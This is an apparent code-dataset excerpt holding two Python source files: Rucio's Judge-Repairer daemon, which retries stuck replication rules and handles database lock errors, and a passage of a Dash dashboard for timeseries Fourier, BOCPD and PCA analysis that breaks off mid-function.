source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
repairer.py | # -*- coding: utf-8 -*-
# Copyright 2013-2021 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <martin.barisits@cern.ch>, 2013-2021
# - Vincent Garonne <vincent.garonne@cern.ch>, 2014-2018
# - Mario Lassnig <mario.lassnig@cern.ch>, 2014-2020
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Brandon White <bjwhite@fnal.gov>, 2019
# - Thomas Beermann <thomas.beermann@cern.ch>, 2020-2021
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020
"""
Judge-Repairer is a daemon to repair stuck replication rules.
"""
import logging
import os
import socket
import threading
import time
import traceback
from copy import deepcopy
from datetime import datetime, timedelta
from random import randint
from re import match
from sqlalchemy.exc import DatabaseError
import rucio.db.sqla.util
from rucio.common import exception
from rucio.common.exception import DatabaseException
from rucio.common.logging import setup_logging
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.monitor import record_counter
from rucio.core.rule import repair_rule, get_stuck_rules
graceful_stop = threading.Event()
def rule_repairer(once=False):
    """
    Main loop to check for STUCK replication rules

    :param once: If True, perform a single pass and return instead of looping.
    """
    hostname = socket.gethostname()
    pid = os.getpid()
    current_thread = threading.current_thread()
    # Rules that recently failed with a lock conflict, mapped to the time at
    # which they become eligible for repair again.
    paused_rules = {}  # {rule_id: datetime}
    # Make an initial heartbeat so that all judge-repairers have the correct worker number on the next try
    executable = 'judge-repairer'
    live(executable=executable, hostname=hostname, pid=pid, thread=current_thread, older_than=60 * 30)
    graceful_stop.wait(1)
    while not graceful_stop.is_set():
        try:
            # heartbeat: refreshes this worker's registration and yields the
            # current thread assignment used to partition the rule workload.
            heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=current_thread, older_than=60 * 30)
            start = time.time()
            # Refresh paused rules: drop entries whose back-off window expired.
            # Iterate over a copy since entries are deleted during the walk.
            iter_paused_rules = deepcopy(paused_rules)
            for key in iter_paused_rules:
                if datetime.utcnow() > paused_rules[key]:
                    del paused_rules[key]
            # Select a bunch of rules for this worker to repair.
            # delta=-1 in single-shot mode so even freshly-stuck rules qualify.
            rules = get_stuck_rules(total_workers=heartbeat['nr_threads'],
                                    worker_number=heartbeat['assign_thread'],
                                    delta=-1 if once else 1800,
                                    limit=100,
                                    blocked_rules=[key for key in paused_rules])
            logging.debug('rule_repairer[%s/%s] index query time %f fetch size is %d' % (heartbeat['assign_thread'], heartbeat['nr_threads'], time.time() - start, len(rules)))
            if not rules and not once:
                # Nothing to do; sleep before polling again.
                logging.debug('rule_repairer[%s/%s] did not get any work (paused_rules=%s)' % (heartbeat['assign_thread'], heartbeat['nr_threads'], str(len(paused_rules))))
                graceful_stop.wait(60)
            else:
                for rule_id in rules:
                    # get_stuck_rules returns row tuples; the id is column 0.
                    rule_id = rule_id[0]
                    logging.info('rule_repairer[%s/%s]: Repairing rule %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'], rule_id))
                    if graceful_stop.is_set():
                        break
                    try:
                        start = time.time()
                        repair_rule(rule_id=rule_id)
                        logging.debug('rule_repairer[%s/%s]: repairing of %s took %f' % (heartbeat['assign_thread'], heartbeat['nr_threads'], rule_id, time.time() - start))
                    except (DatabaseException, DatabaseError) as e:
                        if match('.*ORA-00054.*', str(e.args[0])):
                            # Oracle "resource busy": another worker holds locks on
                            # this rule; pause it for a random 10-40 minute back-off.
                            paused_rules[rule_id] = datetime.utcnow() + timedelta(seconds=randint(600, 2400))
                            logging.warning('rule_repairer[%s/%s]: Locks detected for %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'], rule_id))
                            record_counter('rule.judge.exceptions.LocksDetected')
                        elif match('.*QueuePool.*', str(e.args[0])):
                            # Connection-pool exhaustion: transient, log as warning.
                            logging.warning(traceback.format_exc())
                            record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
                        elif match('.*ORA-03135.*', str(e.args[0])):
                            # Oracle "connection lost contact": transient as well.
                            logging.warning(traceback.format_exc())
                            record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
                        else:
                            logging.error(traceback.format_exc())
                            record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
        except (DatabaseException, DatabaseError) as e:
            # Database errors raised outside the per-rule loop (e.g. during
            # rule selection); same transient-vs-fatal triage as above.
            if match('.*QueuePool.*', str(e.args[0])):
                logging.warning(traceback.format_exc())
                record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
            elif match('.*ORA-03135.*', str(e.args[0])):
                logging.warning(traceback.format_exc())
                record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
            else:
                logging.critical(traceback.format_exc())
                record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
        except Exception as e:
            # Catch-all so one bad cycle cannot kill the daemon thread.
            logging.critical(traceback.format_exc())
            record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
        if once:
            break
    # Deregister this worker's heartbeat on shutdown.
    die(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
def stop(signum=None, frame=None):
    """
    Graceful exit.

    Signature is signal-handler compatible (signum, frame); both arguments
    are ignored. Sets the module-wide event so worker threads finish their
    current cycle and exit.
    """
    graceful_stop.set()
def run(once=False, threads=1):
    """
    Starts up the Judge-Repairer threads.

    :param once: If True, run a single repair pass in the calling thread.
    :param threads: Number of repairer threads to spawn when looping.
    :raises DatabaseException: If the database schema is outdated.
    """
    setup_logging()

    if rucio.db.sqla.util.is_old_db():
        raise exception.DatabaseException('Database was not updated, daemon won\'t start')

    executable = 'judge-repairer'
    hostname = socket.gethostname()
    sanity_check(executable=executable, hostname=hostname)

    if once:
        rule_repairer(once)
    else:
        logging.info('Repairer starting %s threads' % str(threads))
        # Use a distinct name for the thread objects so the `threads`
        # parameter (an int) is not shadowed by a list.
        workers = [threading.Thread(target=rule_repairer, kwargs={'once': once}) for _ in range(threads)]
        for worker in workers:
            worker.start()
        # Interruptible joins require a timeout.
        while workers[0].is_alive():
            for worker in workers:
                worker.join(timeout=3.14)
|
app.py | """============================================================================
Python Dashboard produced to monitor timeseries data with high periodicity and search for anomalous regions in the data.
Dashboard largely developed based on tutorial located at https://realpython.com/python-dash/ and inspired by https://dash-gallery.plotly.host/dash-manufacture-spc-dashboard/.
Contents:
- Imports and Set Up
- Local Parameters
- Hyperparameter Loading
- Read In Markdown
- Functions used in callbacks
- Tabs, Graphs and Banners
- Individual tab layouts
Tab 1: Raw variables
Tab 2: Fourier Analysis
Tab 3: Alpha Analysis
Tab 4: BOCPD
Tab 5: PCA
- Bootstrap Style sheet and run
- Layout
- Callbacks
- Modals
- Server time
- Tabs
- Callbacks Tab 1:
- Callbacks Tab 2:
- Callbacks Tab 3:
- Callbacks Tab 4:
- Callbacks Tab 5:
- Cache
- Reset Folders data
- argv
Author: Joseph Walker j.j.walker@durham.ac.uk
============================================================================"""
################################################################################################################
# Imports and Set Up
################################################################################################################
#Required Dash Libraries
#Initialization
import dash
#Interactive components
import dash_core_components as dcc
#HTML tags
import dash_html_components as html
#Bootstrap components cols and rows
import dash_bootstrap_components as dbc
#Callback functions
from dash.dependencies import Output, Input, State
#Pandas for data import and management
import pandas as pd
import numpy as np
import scipy
#For moving data around as child
import json
#Command lines
import sys, getopt
import os
import time
#For manipulating datetime format
from datetime import datetime
from datetime import timedelta
#Import python codes for each anaylsis
from codes import DatManipulation as DatM
from codes import Fourier
from codes import BOCPD
from codes import PCA
from codes import Misc
from codes import CalcStats
#Graph code
from codes import DashPlots
from codes import Graphing
from multiprocessing import Process
#Default Parameters
import Vars
#######################
# Local Parameters
#######################
# Tab shown when the dashboard first loads.
defaulttab='tab-1'
#Timing for periodic refreshes
# Refresh periods (seconds) for the dcc.Interval components; small/mid/big
# presumably correspond to cheap vs. expensive callbacks — confirm in layout.
dt_small = 1
dt_mid = 5
dt_big = 5
#######################
# Hyperparameter Loading
#######################
# General Dash settings: search-box height (CSS) and figure height in pixels.
#General Dashsettings
SearchHeight = "60px"
FigHeightPX = 400
# Defaults pulled from the project-level Vars module.
DefaultFeature = Vars.DefaultFeature
DefaultErrSize = Vars.DefaultErrSize
DefaultDataType = Vars.DefaultDataType
DefaultRescale = Vars.DefaultRescale
DefaultMetric = Vars.DefaultMetric
#General Window
WindowUnit = Vars.WindowUnit
WindowN = Vars.WindowN
#Alpha Hyperparameters
# Minimum frequency used by the Fourier power-spectrum fit; pushed into the
# Fourier module as a module attribute.
Alpha_MinFreq = Vars.Alpha_MinFreq
Fourier.Alpha_MinFreq = Alpha_MinFreq
#Set DefaultParams
# BOCPD (Bayesian Online Change Point Detection) hyperparameters, also
# propagated into the BOCPD module as attributes.
BOCPD_tol = Vars.BOCPD_tol
BOCPD_haz = Vars.BOCPD_haz
BOCPD_MaxSeqLength = Vars.BOCPD_MaxSeqLength
BOCPD_errsScale = Vars.BOCPD_errsScale
BOCPD.BOCPD_tol = BOCPD_tol
BOCPD.BOCPD_MaxSeqLength = BOCPD_MaxSeqLength
BOCPD.BOCPD_haz = BOCPD_haz
#PCA Hyperparameters
PCA_FittedParams = Vars.PCA_FittedParams
PCA_WindowUnit = WindowUnit
PCA_WindowN = WindowN
#Rolling window
PCA.Rolling_WindowUnit = Vars.Rolling_WindowUnit
PCA.Rolling_Window = Vars.Rolling_Window
# File suffix used by the data-manipulation helpers when globbing/saving.
DatM.FileSuffix = Vars.FileSuffix
Graphing.BOCPD_errsScale = Vars.BOCPD_errsScale
# Toggles for persisting figures and cached intermediate results.
SaveFigs = Vars.SaveFigs
SaveCache = Vars.SaveCache
#######################
# Read In Markdown
#######################
# Load the info markdown and prefix every line with "\n \t" so it renders
# as an indented literal block in dcc.Markdown. The original implementation
# appended character-by-character (quadratic string building); a single
# str.replace produces the identical result in one pass.
text_markdown = "\n \t"
with open('assets' + os.sep + 'LoadInfo.md') as this_file:
    text_markdown += this_file.read().replace("\n", "\n \t")
################################################################################################################
# Functions used in callbacks
################################################################################################################
def update_dropdown_files(DataDirectory):
    '''
    Update options for dropdown listing available files,
    Parameters:
        DataDirectory (str): directory containing files
    Returns:
        OptionsDict (dcc.options): dropdown options
        value (dcc.value): value of dropdown
    '''
    Files = DatM.GlobDirectory(DataDirectory)
    if not Files:
        # No data files found: empty options and no selection. (The original
        # built a comprehension over an empty list, which is always [].)
        return [], None
    # Default the dropdown to the first available file.
    return [{'label': "Variable: %s" % (name), 'value': name} for name in Files], Files[0]
def DateSlider(jsonified_data):
    '''
    Return the data slider for a given data set with datetime index,
    Parameters:
        jsonified_data (JSON): jsonified data with datatime index
    Returns:
        Min (float): Min value on slider
        Max (float): Max value on slider
        value (list[float]): [Initial Start, Initial End]
        marks (dict): dict of marks locations
    '''
    # Sentinel values indicate no data has been loaded yet: return a
    # placeholder slider spanning 0-10 with no marks.
    if jsonified_data in [0, "0", None, "None"]:
        return 0, 10, [0, 10], {}
    # Recover the datetime index and convert its bounds to unix milliseconds.
    daterange = pd.read_json(jsonified_data, orient='split').index
    lo = Misc.unixTimeMillis(daterange.min())
    hi = Misc.unixTimeMillis(daterange.max())
    marks = Misc.getMarksDates(daterange.min(), daterange.max(), daterange)
    return lo, hi, [lo, hi], marks
def LoadDataAfterDropdowns(DataDirectory, Data_i_Name, inter=False):
    '''
    Load and jsonify data to move through callbacks,
    Parameters:
        DataDirectory (str): directory containing files
        Data_i_Name (str): File name
        inter (bool): T/F If to run linear interpolation on missing datapoints
    Returns:
        json (JSON): Jsonified data
    '''
    # No file selected yet: return the 0 sentinel consumed by downstream
    # callbacks (see DateSlider).
    if Data_i_Name in [None, "None"]:
        return 0
    frame = DatM.LoadData(DataDirectory, Data_i_Name, inter)
    return frame.to_json(date_format='iso', orient='split')
def toggle_modal(n1, n2, is_open):
    '''
    Toggle info modal displays
    Parameters:
        n1 (bool): Is open clicked
        n2 (bool): Is close clicked
        is_open (bool): T/F is open or closed
    Returns:
        is_open (bool): T/F is open or closed
    '''
    # Either button click flips the modal state; otherwise it is unchanged.
    clicked = bool(n1) or bool(n2)
    return (not is_open) if clicked else is_open
def Intervals(RefreshRate, ID):
    '''
    Create Intervals object to fire periodically,
    Parameters:
        RefreshRate (float): Rate for fire in seconds,
        ID (str): Reference name,
    Returns:
        Interval (dcc.interval): dcc.interval object
    '''
    # dcc.Interval expects milliseconds; convert from seconds.
    millis = RefreshRate * 1000
    return dcc.Interval(id=ID, interval=millis, n_intervals=0)
def Spinner(ID):
    '''
    Return loading spinner object,
    Parameters:
        ID (str): Reference name,
    Returns:
        Div (html.Div): html.Div containing spinner object to display when loading
    '''
    # Fullscreen spinner with a transparent backdrop, shown while the
    # wrapped Div (identified by ID) is loading.
    spinner = dbc.Spinner(
        html.Div(id=ID),
        size='lg',
        fullscreen=True,
        fullscreen_style={"background-color": None},
        color="#68246D",
    )
    return html.Div(spinner)
def build_Process(Tab):
    '''
    Returns progress bar and run all button,
    Parameters:
        Tab (str): Part of string defining referance ID
    Returns:
        Div (html.Div): html.Div object containing progress bar and run button
    '''
    def _spacer():
        # Blank 1-wide padding column.
        return dbc.Col(html.Div(), width=1, className="Cols")

    run_button = dbc.Col(
        dbc.Button('Run All', id=Tab + 'Process-Button', n_clicks=0, className="Button"),
        width=2,
        className="Cols",
    )
    progress_bar = dbc.Col(
        dbc.Progress("0\u0025", value=0, id=Tab + 'Process-Progress', className="Progress", barClassName="ProgressBar"),
        width=7,
        className="Cols",
    )
    header = html.H3(children="Run all:", id=Tab + "Process-Header", className="Header-text")
    controls = dbc.Row(
        children=[_spacer(), run_button, _spacer(), progress_bar, _spacer()],
    )
    return html.Div(children=[header, controls], id=Tab + "Process")
################################################################################################################
# Tabs, Graphs and Banners
################################################################################################################
def build_graph(ID, Size):
    '''
    Returns empty plotly graph placeholder
    Parameters:
        ID (str): ID referance for this graph
        Size (int): Pixel sixt
    Returns:
        Div (html.Div): html.Div containing blank dcc.Graph object
    '''
    # Placeholder figure; callbacks replace it once data is selected.
    placeholder = DashPlots.EmptyFig(Size)
    graph = dcc.Graph(
        figure=placeholder,
        id=ID,
        config={"displayModeBar": False, "doubleClick": "reset"},
    )
    return html.Div(graph, className="graphContainer")
def build_banner():
    '''
    Return banner html.Div element framing the dashboard
    Parameters:
    Returns:
        Div (html.Div): html.Div object containing the banner build
    '''
    # Title and subtitle shown on the left of the banner.
    title_block = html.Div(
        id="banner-text",
        children=[
            html.H5("Timeseries Analysis Dashboard"),
            html.H6("A frequency analysis toolbox"),
        ],
    )
    # Clickable logos linking out to Durham University and Plotly Dash.
    durham_logo = html.A(
        [html.Img(src="assets" + os.sep + "durham-university-2019.png")],
        href="https://www.dur.ac.uk/",
        target='_blank',
    )
    plotly_logo = html.A(
        [html.Img(src="assets" + os.sep + "logo-plotly.svg")],
        href="https://plotly.com/dash/",
        target='_blank',
    )
    logo_block = html.Div(id="banner-Img", children=[durham_logo, plotly_logo])
    return html.Div(id="banner", className="banner", children=[title_block, logo_block])
def build_tabs():
    '''
    Return dcc.Tabs which define main appearance of the dashboard
    Parameters:
    Returns:
        Div (html.Div): html.Div containing all Tabs and larger structure of dashboard
    '''
    # (label, value) pairs for the five analysis tabs, in display order.
    tab_specs = [
        ('Variables', 'tab-1'),
        ('Fourier Analysis', 'tab-2'),
        ('Alpha Analysis', 'tab-3'),
        ('BOCPD', 'tab-4'),
        ('PCA', 'tab-5'),
    ]
    tab_children = [
        dcc.Tab(label=label, value=value, className="custom-tab", selected_className="custom-tab--selected")
        for label, value in tab_specs
    ]
    tabs = dcc.Tabs(
        id='tabs',
        className="custom-tabs",
        value=defaulttab,
        children=tab_children,
    )
    return html.Div(className="tabs", children=[tabs])
################################################################################################################
# Individual tab layouts
################################################################################################################
#######################
# Tab 1: Raw variables
#######################
def build_rawdatasummary(Parameters):
    '''
    Return the key stats summary to left of Rawgraph figure
    Parameters:
        Parameters (dict): dictionary of statistics over the highlighted region
    Returns:
        Div (html.Div): Formated left column containing data.
    '''
    # Bounds are only meaningful when statistics exist for the highlighted
    # region; "N/A" is the empty-stats sentinel (see CalcStats.CalcStatsEmpty).
    if Parameters["Mean"] != "N/A":
        t0 = Misc.unixToDatetime(Parameters["Start"])
        t1 = Misc.unixToDatetime(Parameters["End"])
    else:
        t0 = "N/A"
        t1 = "N/A"
    # Help text displayed in the pop-up info modal.
    ModalText = [
        html.P(["An interactive plot showing the variables selected with the string search or dropdown menu. Place data in the data/Rawdata folder and \
the drop-down menus will automatically display available data. The radio select 'Rescaled' will mean center the plotted data and 'None' will \
plot in natural units. On the left section of the graph are readouts of key statistics of the highlighed region which can be adjusted using \
the slider. Up-to 6 features can be plotted at once."],className="Header-text"),
    ]
    return html.Div(
        children = [
            # Info modal; opened/closed by the RawModal-Open/Close buttons.
            dbc.Modal(
                children = [
                    dbc.ModalHeader("Raw variables info"),
                    dbc.ModalBody(ModalText),
                    dbc.ModalFooter(
                        dbc.Button("Close", id="RawModal-Close", className="ModalButton")
                    ),
                ],
                size="lg",
                scrollable=True,
                id="RawModal",
            ),
            # Readouts of the highlighted window bounds and basic statistics.
            html.H3(["Raw variables plot"],className="Header-text"),
            html.P(["Highlighted region statistics;"],className="Header-text"),
            html.P(["t",html.Sub("0")," = %s" % (t0)],className="Para-text"),
            html.P(["t",html.Sub("1")," = %s" % (t1)],className="Para-text"),
            html.P(["t",html.Sub("0"),"-t", html.Sub("1"),"=%s days" % (Parameters["Duration"])],className="Para-text"),
            html.P(["\u0394t = %s %s" % (Parameters["Rate"], Parameters["RateUnit"])],className="Para-text"),
            html.P(["The calculated statistics;"],className="Header-text"),
            html.P(["\u00B5(x[t",html.Sub("0"),":t",html.Sub("1"),"]) = %s" % (Parameters["Mean"])],className="Para-text"),
            html.P(["\u03C3(x[t",html.Sub("0"),":t",html.Sub("1"),"]) = %s" % (Parameters["STD"])],className="Para-text"),
            html.P(["min(x[t",html.Sub("0"),":t",html.Sub("1"),"]) = %s" % (Parameters["Min"])],className="Para-text"),
            html.P(["max(x[t",html.Sub("0"),":t",html.Sub("1"),"]) = %s" % (Parameters["Max"])],className="Para-text"),
            # Info button that opens the modal above.
            dbc.Button(
                html.Span( html.Img(src="assets"+os.sep+"info.png", className="ButtonImg")),
                id="RawModal-Open", className="ButtonInfo"
            ),
        ],
        className="graphContainer",
    )
def build_tab1(DefaultFeature, DefaultErrSize, DefaultDataType, DefaultRescale):
    '''
    Return the tab element of the Raw graphs tab.
    Parameters:
        DefaultFeature (str): Default search string
        DefaultErrSize (float): Error scaling factor
        DefaultDataType (str): "Raw", "Alpha" or "BOCPD"
        DefaultRescale (float): "Norm", Plot as raw, "Rescale", plot mean centered features
    Returns:
        Div (html.Div): Built Tab
    '''
    offset = 1  # NOTE(review): unused in this builder
    sizegraph = 8  # graph column width (of 12); summary column gets the rest
    TabName = "Raw"  # prefix for all component ids on this tab
    return html.Div(
        children=[
            # Loading spinners tied to this tab's callbacks.
            Spinner("Spinner-tab1-A"),
            Spinner("Spinner-tab1-B"),
            Spinner("Spinner-tab1-C"),
            Spinner("Spinner-tab1-D"),
            #Placeholders
            # Hidden H1s used as data stores shuttled between callbacks.
            html.Div(
                style={'display': 'none'},
                children = [
                    html.H1(
                        id=TabName+'Direct',
                        children="data"+os.sep+TabName+'Data',
                    ),
                    html.H1(
                        id=TabName+'Data',
                        children="0",
                    ),
                    html.H1(
                        id=TabName+'DataError',
                        children="0",
                    ),
                    html.H1(
                        id=TabName+'DataSummary',
                        children=json.dumps(CalcStats.CalcStatsEmpty()),
                    ),
                ]
            ),
            dbc.Row(
                children = [
                    #First column
                    # Statistics summary panel (populated by callbacks).
                    dbc.Col(
                        html.Div(
                            children = [
                                build_rawdatasummary(CalcStats.CalcStatsEmpty())
                            ],
                            id="RawTable",
                        ),
                        width=12-sizegraph,
                        className = "Cols",
                    ),
                    #Second column
                    # Controls row, main graph, and date-range slider.
                    dbc.Col(
                        children = [
                            dbc.Row(
                                children = [
                                    dbc.Col(
                                        children=[
                                            dcc.Dropdown(
                                                id=TabName+'ColName-dropdown',
                                                multi=True,
                                                placeholder="Select a variable",
                                                style = {"overflow-y":"scroll", "height":SearchHeight},
                                            ),
                                        ],
                                        width={"size":6, "offset": 0},
                                        className = "Cols",
                                    ),
                                    dbc.Col(
                                        children=[
                                            dcc.Input(
                                                id=TabName+'StrSearch',
                                                type="text",
                                                value=DefaultFeature,
                                                placeholder="String Search",
                                                style={'width': "100px"},
                                            ),
                                        ],
                                        width={"size":2, "offset": 0},
                                        className = "Cols",
                                    ),
                                    dbc.Col(
                                        children=[
                                            dcc.Input(
                                                id=TabName+'SigNum',
                                                type="number",
                                                value=DefaultErrSize,
                                                min=0,
                                                placeholder="Error multiplier",
                                                style={'width': "100px"},
                                            ),
                                        ],
                                        width={"size":2, "offset": 0},
                                        className = "Cols",
                                    ),
                                    dbc.Col(
                                        dcc.RadioItems(
                                            id=TabName+'Normed',
                                            options=[{'label': i+" ", 'value': i} for i in ['None','Rescaled']],
                                            value=DefaultRescale,
                                        ),
                                        width={"size":2, "offset": 0},
                                        className = "Cols",
                                    ),
                                ],
                                className = "Rows",
                            ),
                            dbc.Row(
                                children = [
                                    build_graph("RawGraph", FigHeightPX),
                                ],
                                className = "Rows",
                            ),
                            # Range slider flanked by 1-wide padding columns.
                            dbc.Row(
                                children = [
                                    dbc.Col(
                                        children=[
                                            html.Div()
                                        ],
                                        width={"size":1, "offset": 0},
                                        className = "Cols",
                                    ),
                                    dbc.Col(
                                        children = [
                                            dcc.RangeSlider(
                                                id=TabName+'RangeSlider',
                                            )
                                        ],
                                        width={"size":10, "offset": 0},
                                        style={"display": "inline-block", "width": "100%"},
                                    ),
                                    dbc.Col(
                                        children=[
                                            html.Div()
                                        ],
                                        width={"size":1, "offset": 0},
                                        className = "Cols",
                                    ),
                                ],
                                className = "Rows",
                            ),
                        ],
                        width=sizegraph,
                        className = "Cols",
                    )
                ]
            )
        ]
    )
#######################
# Tab 2: Fourier Analysis
#######################
def build_fourierdatasummary(Parameters, FourierStats):
    '''
    Return the key stats summary to left of figures
    Parameters:
        Parameters (dict): dictionary of statistics over the highlighted region about raw data
        FourierStats (dict): dictionary of statistics over the highlighted region about Fourier fit
    Returns:
        Div (html.Div): Formated left column containing data.
    '''
    # "N/A" mean marks the empty-stats sentinel; only convert bounds when
    # real statistics are present.
    if Parameters["Mean"] != "N/A":
        t0 = Misc.unixToDatetime(Parameters["Start"])
        t1 = Misc.unixToDatetime(Parameters["End"])
    else:
        t0 = "N/A"
        t1 = "N/A"
    # Help text displayed in the pop-up info modal.
    ModalText = [
        html.P(["This demo tab demonstrates the fast Fourier transform that is preformed for the \u03B1 analysis. The slider allows adjustments to \
the window size and refits the transform over this region. The red line indicates the fitted power spectrum function of the form \
A",html.Sub("0"),"f",html.Sup("\u03B1")," This \u03B1 is value associated for this window. Details of the fit and window are shown on \
the left."],className="Header-text"),
    ]
    return html.Div(
        children = [
            # Info modal; opened/closed by the FourierModal-Open/Close buttons.
            dbc.Modal(
                children = [
                    dbc.ModalHeader("Fourier info"),
                    dbc.ModalBody(ModalText),
                    dbc.ModalFooter(
                        dbc.Button("Close", id="FourierModal-Close", className="ModalButton")
                    ),
                ],
                size="lg",
                scrollable=True,
                id="FourierModal",
            ),
            # Window bounds and power-spectrum fit parameters (A0 * f^alpha).
            html.H3(["Fourier anaylsis plots"],className="Header-text"),
            html.P(["Highlighted region statistics;"],className="Header-text"),
            html.P(["t",html.Sub("0")," = %s" % (t0)],className="Para-text"),
            html.P(["t",html.Sub("1")," = %s" % (t1)],className="Para-text"),
            html.P(["t",html.Sub("0"),"-t", html.Sub("1"),"=%s days" % (Parameters["Duration"])],className="Para-text"),
            html.P(["\u0394t = %s %s" % (Parameters["Rate"],Parameters["RateUnit"])],className="Para-text"),
            html.P(["Fit parameters;"],className="Header-text"),
            html.P(["A",html.Sub("0"), "(x[t",html.Sub("0"),":t",html.Sub("1"),"]) = %s \u00B1 %s" % (FourierStats["A0"],FourierStats["A0Err"])],className="Para-text"),
            html.P(["\u03B1(x[t",html.Sub("0"),":t",html.Sub("1"),"]) = %s \u00B1 %s" % (FourierStats["Alpha"],FourierStats["AlphaErr"])],className="Para-text"),
            # Info button that opens the modal above.
            dbc.Button(
                html.Span( html.Img(src="assets"+os.sep+"info.png", className="ButtonImg")),
                id="FourierModal-Open", className="ButtonInfo"
            ),
        ],
        className="graphContainer",
    )
def build_tab2(DefaultFeature, DefaultErrSize, DefaultDataType, DefaultRescale):
    '''
    Return the tab element of the Fourier graphs tab.
    Parameters:
        DefaultFeature (str): Default search string
        DefaultErrSize (float): Error scaling factor
        DefaultDataType (str): "Raw", "Alpha" or "BOCPD"
        DefaultRescale (float): "Norm", Plot as raw, "Rescale", plot mean centered features
    Returns:
        Div (html.Div): Built Tab
    '''
    offset = 1  # NOTE(review): unused in this builder
    sizegraph = 8  # graph column width (of 12); summary column gets the rest
    TabName = "Fourier"  # prefix for all component ids on this tab
    return html.Div(
        children=[
            # Loading spinners tied to this tab's callbacks.
            Spinner("Spinner-tab2-A"),
            Spinner("Spinner-tab2-B"),
            Spinner("Spinner-tab2-C"),
            Spinner("Spinner-tab2-D"),
            #Placeholders
            # Hidden H1s used as data stores shuttled between callbacks.
            html.Div(
                style={'display': 'none'},
                children = [
                    html.H1(
                        id='RawDirect',
                        children="data"+os.sep+"RawData",
                    ),
                    html.H1(
                        id=TabName+'Data',
                        children="0",
                    ),
                    html.H1(
                        id=TabName+'DataSummary',
                        children=json.dumps(CalcStats.CalcStatsEmpty()),
                    ),
                    html.H1(
                        id=TabName+'FourierDataSummary',
                        children=json.dumps(CalcStats.CalcFourierStatsEmpty()),
                    ),
                ]
            ),
            dbc.Row(
                children = [
                    #First column
                    # Fit/statistics summary panel (populated by callbacks).
                    dbc.Col(
                        html.Div(
                            children = [
                                build_fourierdatasummary(CalcStats.CalcStatsEmpty(),CalcStats.CalcFourierStatsEmpty())
                            ],
                            id="FourierTable",
                        ),
                        width=12-sizegraph,
                        className = "Cols",
                    ),
                    #Second column
                    # Controls, power-spectrum graph, raw-series graph, slider.
                    dbc.Col(
                        children = [
                            dbc.Row(
                                children = [
                                    dbc.Col(
                                        children=[
                                            dcc.Dropdown(
                                                id=TabName+'ColName-dropdown',
                                                multi=False,
                                                placeholder="Select a variable",
                                                style = {"overflow-y":"scroll", "height":SearchHeight},
                                            ),
                                        ],
                                        width={"size":6, "offset": 0},
                                        className = "Cols",
                                    ),
                                    dbc.Col(
                                        children=[
                                            dcc.Input(
                                                id=TabName+'StrSearch',
                                                type="text",
                                                value=DefaultFeature,
                                                placeholder="String Search",
                                                style={'width': "100px"},
                                            ),
                                        ],
                                        width={"size":2, "offset": 0},
                                        className = "Cols",
                                    ),
                                    dbc.Col(
                                        children=[
                                            dcc.Input(
                                                id=TabName+'SigNum',
                                                type="number",
                                                value=DefaultErrSize,
                                                min=0,
                                                placeholder="Error multiplier",
                                                style={'width': "100px"},
                                            ),
                                        ],
                                        width={"size":2, "offset": 0},
                                        className = "Cols",
                                    ),
                                    dbc.Col(
                                        dcc.RadioItems(
                                            id=TabName+'LinLog',
                                            options=[{'label': i+" ", 'value': i} for i in ['Linear', 'Log']],
                                            value='Log',
                                            labelStyle={'display': 'inline'}
                                        ),
                                        width={"size":2, "offset": 0},
                                        className = "Cols",
                                    ),
                                ],
                                className = "Rows",
                            ),
                            dbc.Row(
                                children = [
                                    build_graph("FourierGraph", FigHeightPX/2),
                                ],
                                className = "Rows",
                            ),
                            dbc.Row(
                                children = [
                                    build_graph("FourierRawGraph", FigHeightPX/2),
                                ],
                                className = "Rows",
                            ),
                            # Range slider flanked by 1-wide padding columns.
                            dbc.Row(
                                children = [
                                    dbc.Col(
                                        children=[
                                            html.Div()
                                        ],
                                        width={"size":1, "offset": 0},
                                        className = "Cols",
                                    ),
                                    dbc.Col(
                                        children = [
                                            dcc.RangeSlider(
                                                id=TabName+'RangeSlider',
                                            )
                                        ],
                                        width={"size":10, "offset": 0},
                                        style={"display": "inline-block", "width": "100%"},
                                    ),
                                    dbc.Col(
                                        children=[
                                            html.Div()
                                        ],
                                        width={"size":1, "offset": 0},
                                        className = "Cols",
                                    ),
                                ],
                                className = "Rows",
                            ),
                        ],
                        width=sizegraph,
                        className = "Cols",
                    )
                ]
            )
        ]
    )
#######################
# Tab 3: Alpha Analysis
#######################
def build_Alphasdatasummary(Parameters, AlphaParameters):
    '''
    Return the key stats summary to left of figures
    Parameters:
        Parameters (dict): dictionary of statistics over the highlighted region about raw data
        AlphaParameters (dict): dictionary of statistics over the highlighted region about alpha fit
    Returns:
        Div (html.Div): Formated left column containing data.
    '''
    # "N/A" mean marks the empty-stats sentinel; only convert bounds when
    # real statistics are present.
    if Parameters["Mean"] != "N/A":
        t0 = Misc.unixToDatetime(Parameters["Start"])
        t1 = Misc.unixToDatetime(Parameters["End"])
    else:
        t0 = "N/A"
        t1 = "N/A"
    # Help text displayed in the pop-up info modal.
    ModalText = [
        html.P(["This tab displays and performs the \u03B1 anaylsis. Use the string search and dropdown menu to select a series then click run. \
The lower plot displays the orginal feature, the upper the \u03B1 series. Click on a data point in the top to display the fourier window below. \
Clicking run in the lower left corner will run the anaylsis for all files in data\RawData and save them in data\AlphaData. The progess bar \
updates while this is running."],className="Header-text"),
    ]
    return html.Div(
        children = [
